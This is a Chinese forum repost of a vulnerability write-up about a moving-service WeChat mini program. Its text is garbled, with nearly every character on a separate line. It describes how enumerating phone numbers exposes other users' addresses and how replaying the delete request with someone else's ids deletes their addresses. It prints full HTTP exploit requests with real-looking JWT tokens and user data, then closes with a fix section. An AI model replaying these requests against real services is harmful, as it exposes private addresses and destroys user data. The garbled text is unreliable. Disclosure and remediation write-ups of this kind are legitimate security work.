论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
漏洞
[2125] 2020-08-20_某小程序存在越权漏洞
文档创建者:
s7ckTeam
浏览次数:
2
最后更新:
2025-01-16
漏洞
2 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-54
6万
主题
-6万
回帖
-54
积分
管理员
积分
-54
发消息
2020-08-20_某小程序存在越权漏洞
某
小
程
序
存
在
越
权
漏
洞
原
创
无
剧
E
D
I
安
全
2
0
2
0
-
0
8
-
2
0
收
录
于
话
题
#
白
帽
之
旅
,
3
1
个
点
击
蓝
字
点
击
蓝
字
·
关
注
我
们
关
注
我
们
0
1
漏
洞
标
题
某
小
程
序
地
址
处
查
看
和
删
除
处
存
在
逻
辑
漏
洞
0
2
项
目
名
称
某
小
程
序
0
3
所
属
域
名
x
x
x
.
x
x
x
-
x
x
x
x
x
.
c
o
m
0
4
漏
洞
类
型
业
务
逻
辑
漏
洞
0
5
漏
洞
级
别
严
重
0
6
漏
洞
描
述
某
专
运
小
程
序
—
常
用
地
址
—
地
址
查
看
处
可
以
通
过
枚
举
已
注
册
的
用
户
手
机
号
p
h
o
n
e
获
取
所
有
已
注
册
用
户
的
地
址
和
用
户
地
址
信
息
i
d
,
然
后
通
过
越
权
查
询
到
所
有
的
i
d
s
(
也
就
是
查
看
地
址
时
的
i
d
参
数
)
在
删
除
处
可
以
越
权
删
除
所
有
用
户
地
址
。
0
7
漏
洞
U
R
L
h
t
t
p
s
:
/
/
x
x
x
.
c
o
m
/
n
u
t
s
/
x
x
x
/
c
o
x
x
x
x
x
x
/
s
e
l
e
c
t
L
i
s
t
0
8
复
现
步
骤
0
x
0
1
:
打
开
常
用
地
址
功
能
然
后
抓
包
0
x
0
2
:
抓
取
数
据
包
后
,
枚
举
p
h
o
n
e
值
,
全
局
查
看
任
务
用
户
的
地
址
信
息
(
包
含
收
件
人
、
收
件
人
手
机
号
、
收
件
地
址
)
P
o
s
t
包
文
本
:
包
文
本
:
0
x
0
3
:
:
测
试
结
果
:
替
换
P
h
o
n
e
为
x
x
x
x
x
x
5
6
5
P
O
S
T
/
n
u
t
s
/
h
b
-
m
o
v
e
-
a
p
i
/
c
o
m
m
o
n
A
d
d
r
e
s
s
/
s
e
l
e
c
t
L
i
s
t
H
T
T
P
/
1
.
1
H
o
s
t
:
x
x
x
.
c
o
m
C
o
n
n
e
c
t
i
o
n
:
c
l
o
s
e
C
o
n
t
e
n
t
-
L
e
n
g
t
h
:
9
9
U
s
e
r
-
A
g
e
n
t
:
M
o
z
i
l
l
a
/
5
.
0
(
L
i
n
u
x
;
A
n
d
r
o
i
d
5
.
1
.
1
;
v
i
v
o
X
7
P
l
u
s
B
u
i
l
d
/
L
M
Y
4
7
V
)
A
p
p
l
e
W
e
b
K
i
t
/
5
3
7
.
3
6
(
K
H
T
M
L
,
l
i
k
e
G
e
c
k
o
)
V
e
r
s
i
o
n
/
4
.
0
C
h
r
o
m
e
/
3
9
.
0
.
0
.
0
M
o
b
i
l
e
S
a
f
a
r
i
/
5
3
7
.
3
6
M
i
c
r
o
M
e
s
s
e
n
g
e
r
/
7
.
0
.
1
3
.
1
6
4
0
(
0
x
2
7
0
0
0
D
3
5
)
P
r
o
c
e
s
s
/
a
p
p
b
r
a
n
d
0
N
e
t
T
y
p
e
/
W
I
F
I
L
a
n
g
u
a
g
e
/
z
h
_
C
N
A
B
I
/
a
r
m
6
4
W
e
C
h
a
t
/
a
r
m
6
4
c
h
a
r
s
e
t
:
u
t
f
-
8
a
u
t
h
o
r
i
z
a
t
i
o
n
:
e
y
J
0
e
X
A
i
O
i
J
K
V
1
Q
i
L
C
J
h
b
G
c
i
O
i
J
I
U
z
I
1
N
i
J
9
.
e
y
J
p
c
3
M
i
O
i
J
N
S
U
5
H
I
i
w
i
Z
X
h
w
I
j
o
x
N
T
g
2
N
z
g
1
N
T
g
y
L
C
J
1
c
2
V
y
T
m
F
t
Z
S
I
6
I
j
E
4
N
j
U
1
M
T
I
4
N
z
Y
0
I
i
w
i
a
W
F
0
I
j
o
x
N
T
g
2
N
j
k
5
M
T
g
y
f
Q
.
5
x
9
Q
m
e
Y
2
b
Q
g
H
y
S
q
Z
R
g
u
i
W
E
r
7
a
L
k
K
G
r
f
R
M
X
d
g
o
S
s
8
S
I
w
A
c
c
e
p
t
-
E
n
c
o
d
i
n
g
:
g
z
i
p
,
d
e
f
l
a
t
e
c
o
n
t
e
n
t
-
t
y
p
e
:
a
p
p
l
i
c
a
t
i
o
n
/
j
s
o
n
R
e
f
e
r
e
r
:
h
t
t
p
s
:
/
/
x
x
x
.
c
o
m
/
w
x
9
f
c
e
1
d
d
6
7
9
7
5
1
b
6
6
/
1
8
/
p
a
g
e
-
f
r
a
m
e
.
h
t
m
l
{
"
m
i
n
i
P
r
o
g
r
a
m
T
o
k
e
n
"
:
"
m
i
n
i
p
r
o
g
r
a
m
"
,
"
t
o
k
e
n
"
:
"
3
5
8
5
c
2
7
e
3
5
e
4
4
b
2
4
a
5
2
7
b
b
2
6
a
c
6
f
c
b
3
5
"
,
"
p
h
o
n
e
"
:
"
x
x
x
x
x
x
x
5
6
"
}
替
换
P
h
o
n
e
为
x
x
x
x
x
x
x
7
6
4
替
换
P
h
o
n
e
为
1
x
x
x
x
x
x
0
9
6
可
以
枚
举
已
注
册
的
用
户
手
机
号
。
。
。
(
这
里
仅
测
试
)
0
x
0
4
:
:
获
取
到
用
户
地
址
信
息
后
,
获
取
地
址
i
d
值
P
h
o
n
e
为
为
x
x
x
x
x
x
x
x
5
6
5
的
地
址
的
地
址
i
d
为
:
为
:
8
2
1
7
7
7
3
2
0
3
1
4
7
4
1
9
6
4
8
8
2
1
7
7
7
3
2
0
6
3
8
0
6
8
7
3
6
0
8
2
1
7
7
7
3
2
0
9
5
7
7
2
8
7
6
8
0
8
2
1
7
7
7
3
2
1
1
9
6
3
8
4
6
6
5
6
等
等
。
。
。
。
P
h
o
n
e
为
为
x
x
x
x
x
x
8
7
6
4
8
2
1
7
7
6
5
1
0
4
3
0
6
5
6
5
1
2
0
8
2
1
7
7
6
5
3
1
3
0
9
4
8
2
3
9
3
6
8
2
1
7
7
6
5
1
0
8
1
5
3
2
8
2
5
6
0
等
等
。
。
。
0
x
0
5
:
:
查
看
需
要
删
除
的
用
户
地
址
i
d
s
用
来
测
试
越
权
删
除
操
作
测
试
越
权
删
除
账
户
A
1
8
x
x
x
x
x
x
7
6
4
0
x
0
6
:
:
在
B
账
户
下
任
意
进
行
地
址
删
除
操
作
,
抓
包
,
然
后
将
i
d
s
值
换
成
A
账
户
的
地
址
i
d
s
:
8
2
1
7
7
7
8
3
1
9
3
5
4
7
0
3
8
7
2
P
o
s
t
包
文
本
:
包
文
本
:
0
x
0
7
:
:
操
作
结
果
:
A
账
户
地
址
i
d
=
8
2
1
7
7
7
8
3
1
9
3
5
4
7
0
3
8
7
2
成
功
删
除
P
O
S
T
/
n
u
t
s
/
h
b
-
m
o
v
e
-
a
p
i
/
c
o
m
m
o
n
A
d
d
r
e
s
s
/
d
e
l
e
t
e
C
o
m
m
o
n
A
d
d
r
e
s
s
H
T
T
P
/
1
.
1
H
o
s
t
:
x
x
x
x
.
c
o
m
C
o
n
n
e
c
t
i
o
n
:
c
l
o
s
e
C
o
n
t
e
n
t
-
L
e
n
g
t
h
:
1
2
9
U
s
e
r
-
A
g
e
n
t
:
M
o
z
i
l
l
a
/
5
.
0
(
L
i
n
u
x
;
A
n
d
r
o
i
d
5
.
1
.
1
;
v
i
v
o
X
7
P
l
u
s
B
u
i
l
d
/
L
M
Y
4
7
V
)
A
p
p
l
e
W
e
b
K
i
t
/
5
3
7
.
3
6
(
K
H
T
M
L
,
l
i
k
e
G
e
c
k
o
)
V
e
r
s
i
o
n
/
4
.
0
C
h
r
o
m
e
/
3
9
.
0
.
0
.
0
M
o
b
i
l
e
S
a
f
a
r
i
/
5
3
7
.
3
6
M
i
c
r
o
M
e
s
s
e
n
g
e
r
/
7
.
0
.
1
3
.
1
6
4
0
(
0
x
2
7
0
0
0
D
3
5
)
P
r
o
c
e
s
s
/
a
p
p
b
r
a
n
d
0
N
e
t
T
y
p
e
/
W
I
F
I
L
a
n
g
u
a
g
e
/
z
h
_
C
N
A
B
I
/
a
r
m
6
4
W
e
C
h
a
t
/
a
r
m
6
4
c
h
a
r
s
e
t
:
u
t
f
-
8
a
u
t
h
o
r
i
z
a
t
i
o
n
:
e
y
J
0
e
X
A
i
O
i
J
K
V
1
Q
i
L
C
J
h
b
G
c
i
O
i
J
I
U
z
I
1
N
i
J
9
.
e
y
J
p
c
3
M
i
O
i
J
N
S
U
5
H
I
i
w
i
Z
X
h
w
I
j
o
x
N
T
g
2
N
z
g
5
M
j
Q
2
L
C
J
1
c
2
V
y
T
m
F
t
Z
S
I
6
I
j
E
1
M
T
c
4
N
D
E
z
M
D
k
2
I
i
w
i
a
W
F
0
I
j
o
x
N
T
g
2
N
z
A
y
O
D
Q
2
f
Q
.
4
V
i
i
K
t
O
B
h
9
i
f
L
3
m
B
I
m
u
2
P
s
x
d
L
t
P
G
4
s
L
D
B
Z
j
W
P
V
q
Y
F
0
A
A
c
c
e
p
t
-
E
n
c
o
d
i
n
g
:
g
z
i
p
,
d
e
f
l
a
t
e
c
o
n
t
e
n
t
-
t
y
p
e
:
a
p
p
l
i
c
a
t
i
o
n
/
j
s
o
n
R
e
f
e
r
e
r
:
h
t
t
p
s
:
/
/
x
x
x
.
c
o
m
/
w
x
9
f
c
e
1
d
d
6
7
9
7
5
1
b
6
6
/
1
8
/
p
a
g
e
-
f
r
a
m
e
.
h
t
m
l
{
"
i
d
s
"
:
[
"
8
2
1
7
7
6
2
9
0
3
5
2
5
8
9
6
1
9
2
"
]
,
"
m
i
n
i
P
r
o
g
r
a
m
T
o
k
e
n
"
:
"
m
i
n
i
p
r
o
g
r
a
m
"
,
"
t
o
k
e
n
"
:
"
b
9
6
e
6
b
a
f
8
0
b
6
4
e
3
3
9
a
9
d
7
4
9
b
e
1
8
2
9
b
3
e
"
,
"
p
h
o
n
e
"
:
"
x
x
x
x
x
9
6
"
}
0
9
修
复
方
案
1
.
虽
然
添
加
了
用
户
t
o
k
e
n
但
是
并
没
有
起
作
用
。
2
.
鉴
权
系
统
需
要
完
善
,
添
加
用
户
t
o
k
e
n
需
要
后
端
进
行
二
次
验
证
,
判
断
当
前
操
作
是
不
是
具
有
该
用
户
操
作
权
限
。
P
S
:
本
文
仅
用
于
技
术
讨
论
与
分
析
,
严
禁
用
于
任
何
非
法
用
途
,
违
者
后
果
自
负
。
:
本
文
仅
用
于
技
术
讨
论
与
分
析
,
严
禁
用
于
任
何
非
法
用
途
,
违
者
后
果
自
负
。
E
D
I
安
全
安
全
一
个
专
注
渗
透
实
战
经
验
分
享
的
公
众
号
扫
二
维
码
|
关
注
我
们
扫
二
维
码
|
关
注
我
们
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
漏洞